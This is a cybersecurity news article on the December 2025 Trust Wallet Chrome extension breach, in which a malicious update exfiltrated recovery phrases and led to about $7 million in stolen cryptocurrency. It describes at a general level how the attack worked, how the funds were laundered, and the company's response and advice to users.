Trust Wallet Chrome Extension Breach Results in $7 Million Cryptocurrency Theft via Malicious Code
By Ravie Lakshmanan | December 26, 2025 | Cryptocurrency / Incident Response
Trust Wallet, a widely used multi-chain, non-custodial cryptocurrency wallet service, has suffered a significant security breach impacting its Google Chrome extension. The company has confirmed that malicious code embedded in version 2.68 of the extension led to the theft of approximately $7 million worth of cryptocurrency. With nearly one million users affected, Trust Wallet is urging all Chrome extension users to immediately update to version 2.69 to mitigate further losses.
Incident Overview
The breach specifically affected users of the Trust Wallet Chrome extension version 2.68. According to the company, only this browser extension version is impacted; mobile users and other Trust Wallet platforms remain unaffected. Trust Wallet officially announced the incident via a post on X (formerly Twitter), assuring users that they are prioritizing refunding all those impacted by the attack.
“We’ve confirmed that approximately $7 million has been impacted and we will ensure all affected users are refunded,” the company stated. To begin the reimbursement process, affected users have been directed to complete a detailed claim form through Trust Wallet’s official support desk at trustwallet-support.freshdesk.com.
How the Attack Occurred
Blockchain cybersecurity firm SlowMist provided insights into the technical details of the attack. The malicious update introduced code designed to scan all wallets stored within the compromised extension. It then tricked users into entering their wallet’s mnemonic recovery phrase by generating unauthorized requests for this sensitive information. The attacker decrypted these mnemonics using passwords entered when unlocking the wallet and exfiltrated them to a server under their control at the domain api.metrics-trustwallet[.]com.
This rogue domain was registered only days before the attack, on December 8, 2025, with the first data exfiltration requests observed on December 21, 2025. The attackers also employed an open-source full-chain analytics library known as posthog-js, repurposing it for malicious data harvesting and facilitating information leakage through legitimate-looking analytics traffic.
Impact and Fund Laundering
Funds stolen include a mixture of cryptocurrencies: approximately $3 million in Bitcoin (BTC), over $3 million in Ethereum (ETH), and a smaller sum in Solana (SOL). Blockchain investigator ZachXBT has confirmed that the attack has impacted hundreds of victims. PeckShield, a blockchain security company, detailed that while nearly $2.8 million of the stolen assets remain in the hacker’s wallets, more than $4 million has already been funneled to centralized exchanges (CEXs) such as ChangeNOW (~$3.3 million), FixedFloat (~$340,000), and KuCoin (~$447,000). The attackers have also utilized cross-chain bridges to launder and swap the stolen cryptocurrencies, complicating tracing efforts.
Origins and Possible Insider Involvement
Investigations reveal that the attack stemmed from direct manipulation of the Trust Wallet extension’s internal source code — specifically its analytics logic — rather than a compromised third-party library. SlowMist’s analysis suggests that the attacker used a leaked Chrome Web Store API key to bypass Trust Wallet’s normal release controls and push the malicious version 2.68 to the Chrome Web Store. The compromised extension was published on December 24, 2025, after passing Chrome’s review process.
Trust Wallet CEO Eowyn Chen indicated that the malicious version was “not released through our internal manual process” and highlighted ongoing investigations into how the attacker gained deployment permissions or access to developer devices. Industry speculation, including comments from Binance co-founder Changpeng Zhao, has hinted that the exploit was “most likely” an insider attack, although no conclusive evidence has yet been provided.
User Advisory and Scam Warnings
Trust Wallet has cautioned users to only rely on official communication channels and warned against phishing attempts. The company noted a rise in fake compensation forms, impersonation scams, and fraudulent Telegram advertisements targeting victims. Users are urged never to share their mnemonic recovery phrases or private keys under any circumstances and to verify any support communications carefully.
Steps Taken and Next Actions
Following the incident discovery, Trust Wallet promptly suspended the malicious domain, revoked all existing release APIs, and started processing reimbursements for victims. The company has identified 2,596 wallet addresses affected by the malicious update. However, with approximately 5,000 compensation claims submitted, Trust Wallet emphasized the importance of thorough wallet ownership verification to prevent fraud and ensure rightful reimbursement.
Eowyn Chen concluded, “Supporting affected users is our top priority. We continue to investigate and will evolve our security measures to prevent future incidents.”
What Users Should Do Now:
- Immediately update the Trust Wallet Chrome extension to version 2.69.
- Do not interact with unsolicited messages or forms claiming to be from Trust Wallet unless they originate from official channels.
- Submit claims for reimbursement only through Trust Wallet’s verified support desk: trustwallet-support.freshdesk.com.
- Never share your backup mnemonic phrase or private keys.
This breach underscores the crucial need for vigilance in the cryptocurrency ecosystem and highlights the growing risks posed by supply chain attacks, especially involving browser extensions managing sensitive wallet information.
For further updates on this incident and other cybersecurity news, follow The Hacker News on Google News, Twitter, and LinkedIn.
Tags: Cryptocurrency, Cybersecurity, Browser Extension, Data Exfiltration, Malware, Incident Response, Supply Chain Security, Trust Wallet, Chrome Extension, Blockchain Security
© 2026 The Hacker News. All Rights Reserved.